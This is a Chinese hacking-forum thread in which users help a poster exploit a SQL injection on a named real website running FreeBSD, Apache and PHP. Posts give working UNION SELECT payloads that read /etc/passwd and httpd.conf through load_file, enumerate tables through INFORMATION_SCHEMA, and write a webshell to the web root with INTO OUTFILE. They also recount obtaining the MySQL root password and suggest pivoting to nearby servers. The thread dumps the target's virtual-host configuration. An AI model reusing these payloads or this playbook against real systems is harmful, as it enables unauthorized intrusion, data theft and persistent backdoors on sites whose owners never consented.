标题:
[讨论]郁闷的PHP注入....
[打印本页]
作者:
虚竹
时间:
2008-7-20 23:24
标题:
[讨论]郁闷的PHP注入....
[讨论]郁闷的PHP注入....
议题作者:寂寞hacker
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
今天安检一个站的时候遇到了个郁闷的问题,他全站是html静态的,好不容易在一个偏僻的角落找到了个php注入点,偷笑中....还没笑完呢,郁闷的事情来了,首先猜测字段,偶猜到48了才正常,吓得我以为没戏了,可以直接loadfile /etc/passwd 这个文件,但是郁闷的事情发生了。
情况如下图:
未命名.jpg
(12 KB)
2007-10-29 17:35
原因是网页限制了信息的长度,三个能显示的地方都试过了,基本上只能把pass这个文件的头信息显示出来,后台找不到,数据库字段也猜不到,网站是他们自己写的!WEB环境:
Apache/2.0.59 (Unix) PHP/4.4.4 系统是FreeBSD,对红旗系统不熟。。。接下来。哪位高手指教下。成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
您知道您年薪应是多少?
jackal
晶莹剔透§烈日灼然
作者:
zhcaihhhh
时间:
2008-7-20 23:24
left(file,100)
查看一段字符再合并.
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间105 小时 注册时间2004-11-18 最后登录2008-6-30
查看详细资料
引用
报告
回复
TOP
您知道您年薪应是多少?
Helvin
团队决策人
作者:
德德
时间:
2008-7-20 23:24
FreeBSD跟红旗什么关系?
/etc/passwd 文件中没有密码。ports编译的MySQL没有root权限拿不到/etc/master.passwd,就算拿到也基本没用,master.passwd中的密码是MD5的。
输出个webshell看看root下面有什么,有没有记录密码什么的,看一下有没有装有能提权的软件,BSD的内核级漏洞很少,可以从应用程序软件上入手。系统应该是FB6.1吧幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子644 精华
22
积分5000 阅读权限255 在线时间1758 小时 注册时间2005-1-7 最后登录2008-7-20
查看详细资料
引用
报告
回复
TOP
爱要怎么说出口
...
晶莹剔透§烈日灼然
作者:
kklau
时间:
2008-7-20 23:24
load_file() 读下。。48 个字段? PHP手工 苦活啊。慢慢跑吧··
帖子32 精华
0
积分114 阅读权限40 性别男 在线时间48 小时 注册时间2007-8-22 最后登录2008-7-1
查看详细资料
引用
报告
回复
TOP
asm
运维管理组
作者:
ahwx
时间:
2008-7-20 23:24
字符截取啊,能让显示多少就显示多少游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn
帖子1598 精华
30
积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20
查看详细资料
引用
报告
回复
TOP
良辰择日,预测咨询,公司改名,权威易经
寂寞宝贝
荣誉会员
作者:
高步轩仔
时间:
2008-7-20 23:24
引用:
引用第2楼Helvin于2007-10-29 18:55发表的 :
FreeBSD跟红旗什么关系?
/etc/passwd 文件中没有密码。ports编译的MySQL没有root权限拿不到/etc/master.passwd,就算拿到也基本没用,master.passwd中的密码是MD5的。
输出个webshell看看root下面有什么,有没有记录密码什么的,看一下有没有装有能提权的软件,BSD的内核级漏洞很少,可以从应用程序软件上入手。系统应该是FB6.1吧
汗!说错了!FreeBSD跟红旗没关系,关于PASS被加密,这条路不走了!至于Helvin大哥说的输出webshell是什么意思?建个表导出么?给点资料!很久没碰这个了!呵呵!谢谢!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
良辰择日,预测咨询,公司改名,权威易经
寂寞宝贝
荣誉会员
作者:
车来车去
时间:
2008-7-20 23:24
FreeBSD下面。。。如何得到当前的WEB路径?因为他关闭了错误回显!得不到文件路径!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
hackest
运维管理组
作者:
marco
时间:
2008-7-20 23:24
有root的话可以into outfile()导出一句话的My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
帖子882 精华
20
积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3
查看个人网站
查看详细资料
引用
报告
回复
TOP
ring04h
团队执行官
作者:
白兔仔
时间:
2008-7-20 23:24
引用:
引用第7楼hackest于2007-10-29 23:39发表的 :
有root的话可以into outfile()导出一句话的
php outfile 需要 ' 单引号或者双引号, 无法outfile!
帖子3923 精华
128
积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
ring04h
团队执行官
作者:
东莞维维
时间:
2008-7-20 23:24
引用:
引用第6楼寂寞宝贝于2007-10-29 20:56发表的 :
FreeBSD下面。。。如何得到当前的WEB路径?因为他关闭了错误回显!得不到文件路径!
load httpd.conf httpd.conf 国内全是 755 权限. 能读.
帖子3923 精华
128
积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
凯宁
时间:
2008-7-20 23:24
引用:
引用第9楼ring04h于2007-10-30 00:42发表的 :
load httpd.conf httpd.conf 国内全是 755 权限. 能读.
/usr/local/httpd/conf/httpd.conf
默认路径?成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
jack
时间:
2008-7-20 23:24
上面的路径load 没东西!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
sxltxyh
时间:
2008-7-20 23:24
/usr/local/apache2/conf/httpd.conf
这个能读出东东!不过。。。
555555555555
住所: # # Based upon the NCSA server configuration files originally by Rob M
还是受这个框的限制。。。。。。我再想想办法!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
dabofeng
时间:
2008-7-20 23:24
哦也。。。。拿到了。。不过!看不懂ing.....找了几个目录都不对。。求救!
省略废话一大堆后:如下!
module-specific configurations # Include conf/ssl.conf ### Section 3: Virtual Hosts # # VirtualHost: If you want
to maintain multiple domains/hostnames on your # machine you can setup VirtualHost containers for them. Most
configurations # use only name-based virtual hosts so the server doesn't need to worry about # IP addresses.
This is indicated by the asterisks in the directives below. # # Please see the documentation at # # for further
details before you try to setup virtual hosts. # # You may use the command line option '-S' to verify your
virtual host # configuration. # # Use name-based virtual hosting. # #NameVirtualHost *:80 NameVirtualHost
172.28.1.70 ServerName localhost ServerAdmin
info@lonely.cn
DocumentRoot /usr/httpd ServerAdmin
info@lonely.cn
DocumentRoot /usr/httpd/lonely ServerName
www.lonely.cn
ServerAlias lonely.cn
www.lonely.cn
lonely.cn lonely.org
ServerAdmin
info@lonely.cn
DocumentRoot /usr/httpd/lpsgsj ServerName lps.lonely.cn ServerAlias lps.lonely.cn
ServerAdmin
info@lonely.cn
DocumentRoot /usr/httpd/meitangsj ServerName meitan.lonely.cn ServerAlias
meitan.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin
info@lonely.cn
DocumentRoot /usr/httpd/js
ServerName js.lonely.cn DirectoryIndex Default.htm index.html ServerAdmin
info@lonely.cn
DocumentRoot
/usr/httpd/go ServerName go.lonely.cn # # ServerAdmin
info@lonely.cn
# DocumentRoot /usr/httpd/test # ServerName
test.lonely.cn # # # VirtualHost example: # Almost any Apache directive may go into a VirtualHost container. #
The first VirtualHost section is used for requests without a known # server name. # # # ServerAdmin
webmaster@dummy-host.example.com
# DocumentRoot /www/docs/dummy-host.example.com # ServerName dummy-
host.example.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-
access_log common #
帮忙看看。。。谢谢!Web路径,我试了几个都不对!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
胖嘟嘟
时间:
2008-7-20 23:24
汗!最新进度,搞到root帐号密码,3306也开了。。。但是,默认禁止ROOT远程连接!靠!哪位有PHP导出SHELL的资料,给份。谢谢!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
cnhawk
晶莹剔透§烈日灼然
作者:
wds
时间:
2008-7-20 23:24
freebsd 默认是禁止root远程登录
而且su成root要求必须是wheel组的用户
帖子24 精华
0
积分79 阅读权限40 在线时间60 小时 注册时间2004-12-31 最后登录2008-7-1
查看详细资料
引用
报告
回复
TOP
Helvin
团队决策人
作者:
d501
时间:
2008-7-20 23:24
BSD root不好拿,他说的应该是MySQL root
WEB绑定有域名,你管他能不能些,解不解析,只要在这些目录下面找个777 ,写入Shell就可以了。是在找不到就当份程序下来,自己查找一下有什么可以利用的地方,所有的WEB目录都有价值,也许有些域名没有解析过来。
172.28.1.70这个是你修改过的,还是他们自己的,如果是自己有的那可能他们上面还有其他服务器在附近,用SQL密码连一下附近的机器测试一下幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子644 精华
22
积分5000 阅读权限255 在线时间1758 小时 注册时间2005-1-7 最后登录2008-7-20
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
gmcc-lxx
时间:
2008-7-20 23:24
Web目录自己研究出来了,看了下大虾们的php导出shell的文章,最后得到如下的东东!因为我能写东西的地方在另外一个库,所以这里我跨库查询了,ts04是我的小马内容, 没过滤!我不要*/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/* 这一段能执行查询的!而且查看页面源代码,我的小马原样在,可是加上这个就查询出错了,貌似是我这个导出没写对!大虾们指教!
/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
逍遥公子
时间:
2008-7-20 23:24
还有,他们的web程序一看就是自己写的,很烂的那种!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
ggdd
晶莹剔透§烈日灼然
作者:
1600cc
时间:
2008-7-20 23:24
substring和load_file()连用。想导出必须找到可写目录。
帖子3 精华
0
积分13 阅读权限40 性别男 在线时间0 小时 注册时间2007-5-1 最后登录2008-6-18
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
作者:
btjily
时间:
2008-7-20 23:24
我就是想问
/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,ts04,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/**/from/**/gsj.tousu_anjian/**/where/**/ts01=5201314159/**/into/**/outfile/**/'/usr/httpd/lonely/service/angel.php'/*
这个导出语句对了木。。。。。不对的话麻烦哪位大虾,说下改哪个?成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
帖子428 精华
12
积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16
查看个人网站
查看详细资料
引用
报告
回复
TOP
唐不狐
很黃很暴力
晶莹剔透§烈日灼然
作者:
→有几坏←
时间:
2008-7-20 23:24
还有一种尝试:找找看有没有PHPMYADMIN的目录,用root登录进去,插表导出shell就舒服多了。当然前提还是得有个目标777的目录
帖子145 精华
2
积分574 阅读权限50 性别男 来自china 在线时间106 小时 注册时间2005-9-27 最后登录2008-7-9
查看个人网站
查看详细资料
引用
报告
回复
TOP
akens
晶莹剔透§烈日灼然
作者:
FI~鱼~SH
时间:
2008-7-20 23:24
借地方发个和PHP有关的问题:
http://www.
***.com/view.php?id=650 存在注入点,手工检测有74个字段,所以没办法用工具查表
用and/**/1=2/**/union/**/select/**/1,TABLE_NAME,3,。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.TABLES--
暴出所有表并找到admins表,但是问题来了,常用列都猜了,但是猜不到,想用
/**/and/**/1=2/**/union/**/select/**/1,COLUMN_NAME,3,4。。。。。,73,74/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME='admins'--
把admins表中的列暴出来,死活都暴不了,不知道是语句错了还是其他的原因,请大家帮忙看看
帖子22 精华
0
积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21
查看详细资料
引用
报告
回复
TOP
heiye88
晶莹剔透§烈日灼然
作者:
滚死草
时间:
2008-7-20 23:24
呵呵...不要急...很简单的...先把思路整理好...比如你前面解决那些问题的方法和思考过程都可以写一写。。方便大家帮你。。。也许在整理的过程中你会豁然开朗..
帖子64 精华
0
积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
寂寞宝贝
荣誉会员
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2